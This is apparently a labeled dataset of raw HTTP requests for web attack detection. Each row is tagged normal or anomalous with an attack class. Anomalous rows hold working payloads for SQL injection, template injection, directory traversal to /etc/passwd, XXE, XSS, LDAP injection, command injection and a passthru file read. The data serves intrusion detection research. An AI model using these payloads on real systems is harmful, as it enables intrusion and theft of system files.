GET /vulnerabilities/sqli/?id=1&jox=5923 HTTP/1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5 Accept-Language: en Cookie: JSESSIONID=6A448B57BA58ABC143CBB0630369C2DA Referer: http://malicious.com/${<#assign ex="freemarker.template.utility.Execute"?new()> ${ex("id")}}%20 Host: localhost Connection: close
anomalous
Server_Side_Template_Injection
GET /?gba=8594 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 431b902f-6a24-4dfd-a7af-f2af4f61a8d2
normal
none
GET /vulnerabilities/sqli/?id=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5 Accept-Language: en Cookie: JSESSIONID=1E28D27050BB283C69990E451F65BC74 Host: localhost Connection: close
anomalous
Directory_Traversal
GET /?thg=1226 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 14_0 like Mac OS X) AppleWebKit/605.1.15 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 72da38bc-4e76-47df-9b06-6cdff7301824
normal
none
GET /vulnerabilities/sqli/?id=1&ama=5709 HTTP/1.1 User-Agent: <form action="/cart/checkout" method="GET"><input type="text" name="user_id" value="0%20"><input type="text" name="_csrf" value="attacker"><input type="image" src="x"> Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5 Accept-Language: en Cookie: JSESSIONID=E54D6579F22AE825B56BA4399DD37460 Host: localhost Connection: close
anomalous
Cross_Site_Request_Forgery
GET /?ich=2846 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 66e188c3-0cd0-45d0-bcde-ae043dad8a6f
normal
none
POST /install/install.php?step=4 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Connection: close Content-Length: 95 Accept: */* Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip DIR_FS_DOCUMENT_ROOT=.%2F&DB_DATABASE=%27%29%3Bpassthru%28%27cat+%2Fetc%2Fpasswd%27%29%3B%2F%2A
anomalous
Advanced_Vulnerability_Scan
GET /?hjc=8860 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: da162a11-6cfd-4109-808b-0f8ebdbbe31d
normal
none
POST / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9 Connection: close Content-Length: 87 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip option=moopenid&email=uzmpvjPBmwEO3tFXq0vlJg%3D%3D&appName=rlHeqZw2vrPzOiWWfCParA%3D%3D
anomalous
Advanced_Vulnerability_Scan
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (iPad; CPU OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5 Accept-Language: en Cookie: JSESSIONID=4F4233D31F115C5452F75E84F8C8874B Host: localhost Content-Type: application/json Connection: close Content-Length: 175 {"id": "<?xml version=\"1.0\" standalone=\"yes\"?><!DOCTYPE foo [<!ENTITY test SYSTEM \"expect://C:/xampp/apache/logs/access.log\"> ]><data>&test;</data>", "action": "search"}
anomalous
XML_External_Entity
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/120.0.0.0 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5 Accept-Language: en Cookie: JSESSIONID=D0B10397654A5566C1EBD5B8BB0FA6C6 Host: localhost Content-Type: application/xml Connection: close Content-Length: 309 <?xml version="1.0" encoding="UTF-8"?> <user> <id><?xml-stylesheet type='text/xsl' href='data:text/xsl,<?xml version="1.0"?><xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:template match="/">YxQnflI4</xsl:template></xsl:stylesheet>?></id> <name>admin</name> </user>
anomalous
XML_External_Entity
GET /?uwe=3647 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 6118169a-143e-4171-92d8-aa0bd7f2cfa8
normal
none
GET /rest/products/search?q=%2D%32%30%37%31%27%2F%2A%21%6F%52%2A%2F%31%30%30%32%3D%43%54%58%53%59%53%2E%44%52%49%54%48%53%58%2E%73%4E%28%31%30%30%32%2C%28%63%68%52%28%31%31%33%29%7C%7C%63%68%52%28%31%31%32%29%7C%7C%63%68%52%28%39%38%29%7C%7C%63%68%52%28%31%30%37%29%7C%7C%63%68%52%28%31%31%33%29%7C%7C%28%2F%2A%21%53%45%6C%65%43%74%2A%2F%28%2F%2A%21%43%41%73%45%2A%2F%2F%2A%21%57%48%45%6E%2A%2F%28%31%30%30%32%3D%31%30%30%32%29%2F%2A%21%54%68%45%4E%2A%2F%31%2F%2A%21%45%4C%53%65%2A%2F%30%2F%2A%21%45%6E%44%2A%2F%29%2F%2A%21%66%52%4F%6D%2A%2F%2F%2A%21%64%75%61%4C%2A%2F%29%7C%7C%63%68%52%28%31%31%33%29%7C%7C%63%68%52%28%39%38%29%7C%7C%63%68%52%28%31%31%32%29%7C%7C%63%68%52%28%31%32%32%29%7C%7C%63%68%52%28%31%31%33%29%29%29%2F%2A%21%6F%52%2A%2F%27%6B%61%79%72%27%3D%27%55%66%43%48 HTTP/1.1 Cache-Control: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0 Referer: http://localhost:3000/rest/products/search Host: localhost:3000 Accept: */* Accept-Encoding: gzip,deflate Connection: close
anomalous
SQL_Injection
GET /manager/html?jil=2526 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; es-es) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1 Authorization: Basic Y3hzZGs6cGFzc3dvcmQ= Accept-Encoding: gzip Connection: close
anomalous
Advanced_Vulnerability_Scan
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5 Accept-Language: en Cookie: JSESSIONID=13F68485104F5BFA437AF5451E01AC31 Host: localhost Content-Type: application/json Connection: close Content-Length: 41 {"id": "14UmSmail=*", "action": "search"}
anomalous
LDAP_Injection
GET /?sic=2606 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 46ed0f63-44d3-4518-9936-db01755bfa52 &extra_info=search=UNION+ALL
normal
none
GET /?ozu=8466 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0 Connection: close Accept-Encoding: gzip
anomalous
Advanced_Vulnerability_Scan
GET /rest/products/search?q=%74%65%73%74%7C%7C%28%2F%2A%21%73%45%4C%45%43%54%2A%2F%30%78%37%35%37%38%37%33%34%39%2F%2A%21%66%52%6F%4D%2A%2F%2F%2A%21%44%55%61%4C%2A%2F%2F%2A%21%77%68%65%72%45%2A%2F%32%30%39%38%3D%32%30%39%38%2F%2A%21%6F%52%2A%2F%65%78%74%72%61%43%54%76%61%6C%55%45%28%31%34%38%31%2C%43%6F%6E%43%61%74%28%30%78%35%63%2C%30%78%37%31%37%30%36%32%36%62%37%31%2C%28%2F%2A%21%73%45%4C%45%43%54%2A%2F%28%45%4C%74%28%31%34%38%31%2F%2A%21%42%65%54%77%45%45%4E%2A%2F%31%34%38%31%2F%2A%21%41%6E%44%2A%2F%31%34%38%31%2C%31%29%29%29%2C%30%78%37%31%36%32%37%30%37%61%37%31%29%29%29%7C%7C HTTP/1.1 Cache-Control: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0 Referer: http://localhost:3000/rest/products/search Host: localhost:3000 Accept: */* Accept-Encoding: gzip,deflate Connection: close
anomalous
SQL_Injection
GET /?lyb=9377 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: c0afe3d9-8ab2-492d-a14b-9cb865564943
normal
none
GET /?zym=0476 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: bb102542-cdd9-4569-95c1-165531edb2ce
normal
none
GET /?ieb=7868 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 65e06245-565d-4e7e-a4d2-c5974d9c636a
normal
none
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5 Accept-Language: en Cookie: JSESSIONID=4EE53F5D73E61096C398FD60FFCAE9B0 Host: localhost Content-Type: application/json Connection: close Content-Length: 61 {"id": "*))%00*))%00*))%00userPassword*", "action": "search"}
anomalous
LDAP_Injection
GET /?kiz=2858 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: acfbb4f7-b8ec-4fa1-9c98-5e24bbdfd373
normal
none
GET /vulnerabilities/sqli/?id=@(7*'7'}} HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5 Accept-Language: en Cookie: JSESSIONID=3FB1B6A8A795FA96D09E9FF97DE4C8AB Host: localhost Connection: close
anomalous
Server_Side_Template_Injection
GET /rest/products/search?q="<base&kow=3226 src=x onkeyup=print()>" HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5 Accept-Language: en Cookie: JSESSIONID=FDD60BAB45C41ED47C71768362729FEA Host: localhost:3000 Connection: close
anomalous
Cross_Site_Scripting
GET /?feq=1942 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 8fb2abd3-055c-4067-9b65-6ad4a8d0f7aa
normal
none
GET /vulnerabilities/sqli/?id=1&elc=1341 HTTP/1.1 User-Agent: )(&( description*\x00 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5 Accept-Language: en Cookie: JSESSIONID=743042C3C5D0E3B8213DAE5BD230A0A1 Host: localhost Connection: close
anomalous
LDAP_Injection
GET /?inb=6141 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 307a8f99-5758-403d-a4ab-32e0662c12cf
normal
none
GET /?mca=3886 HTTP/1.1 Host: localhost:3000 User-Agent: curl/7.68.0 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: a7856fc8-5eb4-4553-a563-3a52268636f1
normal
none
GET /vulnerabilities/sqli/?id=/0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f HTTP/1.1 User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.8 (like Gecko) Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5 Accept-Language: en Cookie: JSESSIONID=DEF83823D7879C8A4D069FC14E7B3DA3 Host: localhost Connection: close
anomalous
Local_File_Inclusion
GET /?ede=7131&q=select+*+from+users HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 6274eae8-50da-4501-beed-4a538ebbd4ca
normal
none
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5 Accept-Language: en Cookie: JSESSIONID=D05CE4917CCCDA116343A38428CBE1CB Host: localhost Content-Type: application/json Connection: close Content-Length: 91 {"id": "'\"><select oninput=window.alert(String.fromCharCode(49))>\"'", "action": "search"}
anomalous
Cross_Site_Scripting
GET /rest/products/search?q=..\..\..\..\..\windows\system32\drivers\etc\hosts HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5 Accept-Language: en Cookie: JSESSIONID=5B64CD23068E909966AB9A153FC267DE Host: localhost:3000 Connection: close
anomalous
Directory_Traversal
GET /vulnerabilities/sqli/?id=1&zhn=9125 HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5 Accept-Language: en Cookie: JSESSIONID=A13B85E88C9191402C2D8D626D0B56D0 Referer: http://malicious.com/..../%u2216..../%u2216..../%u2216..../%u2216..../%u2216etc%u2216passwd Host: localhost Connection: close
anomalous
Directory_Traversal
GET /?vcn=5265 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 76889b85-440d-42be-9ba0-b4948876c166
normal
none
GET /rest/products/search?q=<em><h1 style="color:red;">defaced</h1> HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5 Accept-Language: en Cookie: JSESSIONID=0D9978AADAA7E9FFD25E33E95E916C42 Host: localhost:3000 Connection: close
anomalous
HTML_Injection
GET /rest/products/search?q=apple&cache_id=378a8c75-6eb0-4dce-adf0-fc0515feef68&id=1 OR 1=1 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 378a8c75-6eb0-4dce-adf0-fc0515feef68
normal
none
GET /?ful=6042&file=../../images/logo.png HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: e2f88223-dad7-4d96-9cf5-cd07853edca2
normal
none
GET /?mng=6176 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: a7167c92-a648-44e0-b36e-feaaf988593e
normal
none
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5 Accept-Language: en Cookie: JSESSIONID=7AA4F461CC90EF2D99204C7F2D6EC1A5 Host: localhost Content-Type: application/json Connection: close Content-Length: 37 {"id": "/*/*cn*", "action": "search"}
anomalous
LDAP_Injection
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/120.0.0.0 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5 Accept-Language: en Cookie: JSESSIONID=03DF85D390EEAE354758C1D53B90A6E3 Host: localhost Content-Type: application/json Connection: close Content-Length: 40 {"id": "*))|(*))&(", "action": "search"}
anomalous
LDAP_Injection
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (iPad; CPU OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5 Accept-Language: en Cookie: JSESSIONID=834975D4AE48F9035990876292B118EF Host: localhost Content-Type: application/json Connection: close Content-Length: 53 {"id": "/forward/?go=//evil.com", "action": "search"}
anomalous
Open_Redirect
GET /rest/products/search?q=%20%1aecho%20WKIFUF%24%28%2884%2B94%29%29%24%28echo%20WKIFUF%29WKIFUF%26 HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: commix/v4.2.dev1 (https://commixproject.com) Referer: http://localhost:3000/rest/products/search Host: localhost:3000 Accept: */* Accept-Encoding: gzip, deflate Connection: close
anomalous
Command_Injection
End of preview. Expand in Data Studio

No dataset card yet

Downloads last month
9